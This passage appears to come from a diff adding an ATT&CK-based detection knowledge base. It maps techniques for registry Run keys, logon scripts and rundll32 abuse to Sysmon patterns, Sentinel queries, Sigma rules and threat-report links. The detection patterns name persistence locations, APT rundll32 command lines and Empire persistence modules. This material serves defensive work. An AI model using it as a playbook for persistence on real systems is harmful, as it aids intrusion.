"created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "http://www.symantec.com/connect/blogs/indian-organizations-targeted-suckfly-attacks", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "http://www.secureworks.com/resources/blog/living-off-the-land/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1060", + "command_list": [ + "Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup|Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "powershell/persistence/elevated/registry", + "powershell/persistence/userland/registry" + ], + "commands": [ + { + "command": "Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", + "source": "SysmonHunter - Registry Run Keys / Startup Folder", + "name": "" + }, + { + "command": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup|Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "source": "SysmonHunter - Registry Run Keys / Startup Folder", + "name": "" + }, + { + "command": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", + "source": "SysmonHunter - Registry Run Keys / Startup Folder", + "name": "" + }, + { + "command": "powershell/persistence/elevated/registry", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/userland/registry", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "name": "Registry Run Keys / Startup Folder", + "description": null, + "level": "high", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup|Software\\Microsoft\\Windows\\CurrentVersion\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx|Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce|Software\\Microsoft\\Windows\\CurrentVersion\\RunServices|SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad|Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" + } + }, + "file": { + "path": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + } + } + }, + { + "type": "file", + "process": { + "cmdline": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + } + }, + "file": { + "path": { + "pattern": "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" + } + } + } + ] + }, + { + "Empire Module": "powershell/persistence/elevated/registry", + "ATT&CK Technique #1": "T1060", + "ATT&CK Technique #2": "", + "Technique": "Registry Run Keys / Start Folder", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/registry\": [\"T1060\"]," + }, + { + "Empire Module": "powershell/persistence/userland/registry", + "ATT&CK Technique #1": "T1060", + "ATT&CK Technique #2": "", + "Technique": "Registry Run Keys / Start Folder", + "Concatenate for Python Dictionary": "\"powershell/persistence/userland/registry\": [\"T1060\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and(registry_key_path contains \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run*\"or registry_key_path contains \"*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\*Shell Folders\")", + "name": "Registry Run Keys Or Start Folder" + } + ], + "possible_detections": [ + { + "title": "Suspicious RUN Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "experimental", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "references": [ + "https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/" + ], + "author": "Florian Roth", + "date": "2019/10/01", + "tags": [ + "attack.persistence", + "attack.t1060" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "Image": [ + "*\\Downloads\\\\*", + "*\\Temporary Internet Files\\Content.Outlook\\\\*", + "*\\Local Settings\\Temporary Internet Files\\\\*" + ], + "TargetObject": "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Software installers downloaded and used by users" + ], + "level": "high" + }, + { + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "status": "experimental", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and poiting to a suspicious folder", + "author": "Florian Roth", + "date": "2018/07/18", + "references": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": "*\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "Details": [ + "C:\\Windows\\Temp\\\\*", + "C:\\ProgramData\\\\*", + "*\\AppData\\\\*", + "C:\\$Recycle.bin\\\\*", + "C:\\Temp\\\\*", + "C:\\Users\\Public\\\\*", + "C:\\Users\\Default\\\\*" + ] + }, + "condition": "selection" + }, + "tags": [ + "attack.persistence", + "attack.t1060", + "capec.270" + ], + "fields": [ + "Image", + "ParentImage" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "references": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ], + "author": "Florian Roth, Markus Neis", + "tags": [ + "attack.persistence", + "attack.t1060" + ], + "date": "2018/25/08", + "modified": "2019/10/01", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": [ + "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*", + "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\\\*" + ], + "Details": [ + "*C:\\Windows\\Temp\\\\*", + "*\\AppData\\\\*", + "%AppData%\\\\*", + "*C:\\$Recycle.bin\\\\*", + "*C:\\Temp\\\\*", + "*C:\\Users\\Public\\\\*", + "%Public%\\\\*", + "*C:\\Users\\Default\\\\*", + "*C:\\Users\\Desktop\\\\*", + "wscript*", + "cscript*" + ] + }, + "condition": "selection" + }, + "fields": [ + "Image" + ], + "falsepositives": [ + "Software with rare behaviour" + ], + "level": "high" + }, + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.group-ib.com/blog/cobalt", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://github.com/PowerShellEmpire/Empire", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + ] + }, + { + "technique_id": "T1037", + "command_list": [ + "\\Environment\\UserInitMprLogonScript", + "python/persistence/multi/desktopfile", + "python/persistence/osx/loginhook" + ], + "commands": [ + { + "command": "\\Environment\\UserInitMprLogonScript", + "source": "SysmonHunter - Logon Scripts", + "name": "" + }, + { + "command": "python/persistence/multi/desktopfile", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/persistence/osx/loginhook", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "name": "Logon Scripts", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Environment\\UserInitMprLogonScript" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Environment\\UserInitMprLogonScript" + } + } + } + ] + }, + { + "Empire Module": "python/persistence/multi/desktopfile", + "ATT&CK Technique #1": "T1037", + "ATT&CK Technique #2": "", + "Technique": "Logon Scripts", + "Concatenate for Python Dictionary": "\"python/persistence/multi/desktopfile\": [\"T1037\"]," + }, + { + "Empire Module": "python/persistence/osx/loginhook", + "ATT&CK Technique #1": "T1037", + "ATT&CK Technique #2": "", + "Technique": "Logon Scripts", + "Concatenate for Python Dictionary": "\"python/persistence/osx/loginhook\": [\"T1037\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_command_line contains \"*REG*ADD*HKCU\\\\Environment*UserInitMprLogonScript*\"", + "name": "Logon Scripts" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "experimental", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "references": [ + "https://attack.mitre.org/techniques/T1037/" + ], + "tags": [ + "attack.t1037", + "attack.persistence", + "attack.lateral_movement" + ], + "author": "Tom Ueltschi (@c_APT_ure)", + "falsepositives": [ + "exclude legitimate logon scripts", + "penetration tests, red teaming" + ], + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "exec_selection": { + "ParentImage": "*\\userinit.exe" + }, + "exec_exclusion1": { + "Image": "*\\explorer.exe" + }, + "exec_exclusion2": { + "CommandLine": "*\\netlogon.bat" + }, + "condition": "exec_selection and not exec_exclusion1 and not exec_exclusion2" + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "create_keywords_cli": { + "CommandLine": "*UserInitMprLogonScript*" + }, + "condition": "create_keywords_cli" + } + }, + { + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "create_selection_reg": { + "EventID": [ + 11, + 12, + 13, + 14 + ] + }, + "create_keywords_reg": { + "TargetObject": "*UserInitMprLogonScript*" + }, + "condition": "create_selection_reg and create_keywords_reg" + } + }, + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1085", + "command_list": [ + "\\\\Windows\\\\.+\\\\rundll32.exevbscript|javascript|http|https|.dll" + ], + "commands": [ + { + "command": "\\\\Windows\\\\.+\\\\rundll32.exevbscript|javascript|http|https|.dll", + "source": "SysmonHunter - Rundll32", + "name": "" + } + ], + "parsed_datasets": [ + { + "name": "Rundll32", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\rundll32.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "vbscript|javascript|http|https|.dll" + } + } + } + ] + }, + { + "Rules": "ET Open", + "SID": "2025725", + "Signature": "ET POLICY RunDll Request Over SMB - Likely Lateral Movement", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_parent_path contains \"\\\\rundll32.exe\"or process_path contains \"rundll32.exe\")", + "name": "Rundll32" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY RunDll Request Over SMB - Likely Lateral Movement", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Equation Group DLL_U Load", + "id": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "author": "Florian Roth", + "description": "Detects a specific tool and export used by EquationGroup", + "references": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", + "https://twitter.com/cyb3rops/status/972186477512839170" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": "*\\rundll32.exe", + "CommandLine": "*,dll_u" + }, + "selection2": { + "CommandLine": "* -export dll_u *" + }, + "condition": "1 of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "author": "Florian Roth", + "status": "experimental", + "description": "Detects Trojan loader acitivty as used by APT28", + "references": [ + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/", + "https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100", + "https://twitter.com/ClearskySec/status/960924755355369472" + ], + "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1085", + "car.2013-10-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "rundll32.exe %APPDATA%\\\\*.dat\",*", + "rundll32.exe %APPDATA%\\\\*.dll\",#1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "TropicTrooper 